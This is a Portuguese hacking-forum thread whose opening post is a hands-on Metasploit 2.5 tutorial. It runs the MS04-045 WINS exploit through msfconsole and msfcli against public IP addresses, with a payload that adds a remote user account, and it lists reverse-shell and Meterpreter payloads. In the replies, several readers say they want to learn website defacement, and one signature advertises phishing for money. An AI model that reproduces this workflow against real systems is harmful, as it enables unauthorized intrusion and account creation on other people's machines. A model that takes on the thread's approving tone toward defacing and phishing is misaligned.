Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Utilização do MetaSploit

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Utilização do MetaSploit

    Link para download:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Uma breve introdução:

    O Metasploit é um framework criado por H.D.Moore (se quiserem saber mais sobre ele, leiam o livro diario hacker), que serve para elaboração e execução
    de um repositório de exploits.

    Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objetivo de aprendizado, cada
    um é responsável pelos seus atos.

    O sistema que estou utilizando é o linux. Mas como disse, tem também a versão para windows q faz a mesma coisa. Entao levando em consideração q
    vc tenha instalado em seu computador e esteja funcionando, iremos aprender agora a dominar esta ferramenta.

    O metasploit possui várias ferramentas dentre elas:

    Código:
    msfconsole - metasploit em modo console
    msfcli - interface de automatização de penetração e exploração
    msflogdump - exibe sessões de arquivos de log
    msfplayload - usado para gerar payloads customizados
    msfpescan - utilizado para analisar e descompilar executaveis e DLLs
    msfencode - um codificador interativo de payload encoder
    msfupdate - utilizado para verificar e fazer download de atualização do framework
    msfweb - Interface grafica via browser
    Eu vou ensinar aqui a utilizar somente tres destas ferramentas(msfconsole, msfcli, msfweb), pois acredito q um verdadeiro fuçador aprenderá sozinho o restante não é mesmo Wink

    Se por um acaso algumas pessoas tiverem dificuldade entrem em contato pelo meu e-mail ou por mp Smile

    Deixando o blablabla de lado vamos continuar a nossa caminhada...

    msfconsole:

    Primeiramente digita-se na linha de comando : [root]#./msfconsole

    se for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como:

    Código:
    888 888 d8b888
    888 888 Y8P888
    888 888 888
    88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
    888 888 88bd8P Y8b888 88b88K 888 88b888d8888b888888
    888 888 88888888888888 .d888888Y8888b.888 888888888 888888888
    888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
    888 888 888 Y8888 Y888Y888888 88888P'88888P 888 Y88P 888 Y888
    888
    888
    888
    
    
    + -- --=[ msfconsole v2.5 [105 exploits - 80 payloads]
    
    msf >
    O primeiro comando q deveremos executar será: show

    desta forma:


    888 888 d8b888
    888 888 Y8P888
    888 888 888
    88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
    888 888 88bd8P Y8b888 88b88K 888 88b888d8888b888888
    888 888 88888888888888 .d888888Y8888b.888 888888888 888888888
    888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
    888 888 888 Y8888 Y888Y888888 88888P'88888P 888 Y88P 888 Y888
    888
    888
    888


    + -- --=[ msfconsole v2.5 [105 exploits - 80 payloads]

    msf > show
    msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops'
    msf >
    Viram q apareceu as opções deste comando não é.

    Para vcs saberem quais os exploits que existem neste framework basta digitar o comando: show exploits;
    Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante.

    Entao dentro do ambiente do metasploit escolhemos o exploit assim:

    Código:
    888 888 d8b888
    888 888 Y8P888
    888 888 888
    88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
    888 888 88bd8P Y8b888 88b88K 888 88b888d8888b888888
    888 888 88888888888888 .d888888Y8888b.888 888888888 888888888
    888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
    888 888 888 Y8888 Y888Y888888 88888P'88888P 888 Y88P 888 Y888
    888
    888
    888
    
    
    + -- --=[ msfconsole v2.5 [105 exploits - 80 payloads]
    
    msf > use wins_ms04_045
    msf wins_ms04_045 >
    viram que eu escolhi o wins_ms04_045 e o prompt mudou Smile!!!! Utilizando para isto o comando: use

    continuando...

    Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele aceita . Vejamos:

    msf wins_ms04_045 > show
    msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'
    msf wins_ms04_045 >
    Vimos aqui q ele aceita targets, payloads, options ou advanced.

    Vamos verificar quais opcoes este exploit aceita:

    msf wins_ms04_045 > show options
    Exploit Options
    ===============

    Exploit: Name Default Description
    -------- ------ ------- ------------------
    required RHOST The target address
    required RPORT 42 The target port

    Target: Target Not Specified

    msf wins_ms04_045 >

    Este exploit aceita somente duas opcoes : o ip alvo e a porta alvo. Smile!!!!

    Entao agora vc deve esta se perguntando como faço para utilizar isto. Simples, basta vc setar o q ele aceita, lembrando q onde estiver escrito required,
    significa q estas opcoes tem q ser setadas obrigatoriamente para o exploit funcionar. Continuando...

    Faça assim:

    msf wins_ms04_045 > set RHOST 200.126.35.34
    RHOST -> 200.126.35.34
    msf wins_ms04_04>

    msf wins_ms04_045 > set RPORT 42
    RPORT -> 42
    msf wins_ms04_045 >
    Vejam q utilizei a mesma porta q o valor default...

    Agora teremos q setar o payload para o nosso exploit. O payload nada mais é q um software acoplado ao exploit para fazer as mais variadas tarefas.

    Digitamos entao o comando para saber os payloads suportados pelo nosso exploit: show payloads

    msf wins_ms04_045 > show payloads

    Metasploit Framework Usable Payloads
    ====================================

    Código:
    win32_adduser Windows Execute net user /ADD
    win32_bind Windows Bind Shell
    win32_bind_dllinject Windows Bind DLL Inject
    win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
    win32_bind_stg Windows Staged Bind Shell
    win32_bind_stg_upexec Windows Staged Bind Upload/Execute
    win32_bind_vncinject Windows Bind VNC Server DLL Inject
    win32_exec Windows Execute Command
    win32_passivex Windows PassiveX ActiveX Injection Payload
    win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
    win32_passivex_stg Windows Staged PassiveX Shell
    win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
    win32_reverse_ord Windows Staged Reverse Ordinal Shell
    win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server Inject
    
    msf wins_ms04_045 >
    Eu vou escolher o primeiro payload, q faz com q seja adicionado remotamente um usuario no sistema windows Smile

    Assim:

    msf wins_ms04_045 > set PAYLOAD win32_adduser teste
    PAYLOAD win32_adduser -> teste
    msf wins_ms04_045>
    Vamos agora listar os sistemas operacionais q serão os alvos: Utilizando o velho comando : show, só q agora assim: show targets

    msf wins_ms04_045 > show targets
    Supported Exploit Targets
    =========================

    0 Windows 2000 English

    msf wins_ms04_045 >

    Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem...

    msf wins_ms04_045 > set TARGET 0
    TARGET -> 0
    msf wins_ms04_045 >

    blz, agora basta somente uma coisa para completar nossa tarefa... Executar o nosso exploit, q ta mais para um pacote exploit do q somente um exploit.

    Digite somente: exploit

    msf wins_ms04_045 > exploit

    E pronto...Acabamos a nossa primeira etapa, agora vamos passar para o msfcli.

    O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza
    muito o nosso trabalho na linha de comando digitamos assim:

    [root]#./msfcli wins_ms04_045 RHOST =200.156.23.25 RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E

    e vejam q fará a mesma coisa q no modo console.

    Vamos passar para uma forma ainda mais fácil. Garanto q a garotada q utiliza o windows irao adorar esta forma.

    Trata-se da ferramenta msfweb q quando executado permite fazermos tudo por uma pagina web. para isto faça

    [root]#./msfweb
    +----=[ Metasploit Framework Web Interface (ip:55555)

    Deixe rodando... Abra em seguida o browser e digite na url: seu ip, localhost, 127.0.0.1... Mais a porta 55555

    Seria assim: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    E vcs verão a mágica desta ferramenta.

    Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente selecionando.

    Pessoal, obrigado pela paciencia e espero com este tutorial ter ajudado muitas pessoas aqui. No mais, abraços a todos os usuários.
    Last edited by bolinhaxp; 08-12-2009, 13:01.



  • Font Size
    #2
    Post muito util bolinha , serve para quem quer dar seus primeiros passos nessa maravilhosa ferramenta

    Comment


    • Font Size
      #3
      Ultil ?
      Isso ae é necessario. É essencial.
      Muito Bom.

      Comment


      • Font Size
        #4
        obrigatoriamente agente tem que aprender a utilizar |O
        topico mto roox!
        ta de parabéns mano
        ~# Criado pela [IN]Segurança #~

        Comment


        • Font Size
          #5
          vlw veio , to dando os meus primeiros passos no defacer , ja to lendo esse baita texto ai !
          vlw!
          Nao Participa ainda ?
          * Comunidade Elite Defacer


          Elite Defacer
          Hackeralp - 5ubZer0 - $cr34m()

          Comment


          • Font Size
            #6
            valeu to querendo aprende a fazer defecer
            vai ajuda esse texto ae



            Durante os tempos de mentiras universais, dizer a verdade se torna um ato revolucionário

            Comment


            • Font Size
              #7
              Vlw cara muito bom, parabéns pelo grande post!

              Comment


              • Font Size
                #8
                É bom lembrar dos Créditos.

                Felipe de Souza.

                Abraços
                []'s
                Mesmo longe, eu estou perto. Guia do Hacker 4ever.

                Comment


                • Font Size
                  #9
                  vlw cara muito bom vou tentar para ver se fumfa

                  Comment


                  • Font Size
                    #10
                    Eu to estudando defacer, ia aprender MataSploit, + nem dá véio, tem q fazer maquina virtual, pq o antivirius nao se da mto beim com ele.. abçs!
                    sigpic




                    R.I.P - 2008 —— 2015
                    Capiroto, descanse em paz!

                    русский Империя

                    Phishing's job. PM me!! $$$

                    Comment


                    • Font Size
                      #11
                      Muito bom, parabens

                      Comment


                      • Font Size
                        #12
                        Muito Bom Bolinha !! eu estava com dificudades nessa nova versão do metasploit mas com isso resolve !! (:
                        sigpic

                        Campanha Anti-Ripper: Você não gosta de rippers ("ladrões de coteúdo")? Use essa userbar e faça o seu protesto.

                        Comment


                        • Font Size
                          #13
                          Muito bom mesmo !!

                          Comment


                          • Font Size
                            #14
                            O MetaSploit é show...

                            Belo tutorial
                            Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

                            Comment


                            • Font Size
                              #15
                              Muito bom o tópico, realmente eu sempre ficava me perguntando o que era MetaSploit, agora tá tudo explicadinho *_*
                              sigpic
                              Você é bom de segurança? Então segura aqui

                              Comment

                              X
                              Working...
                              X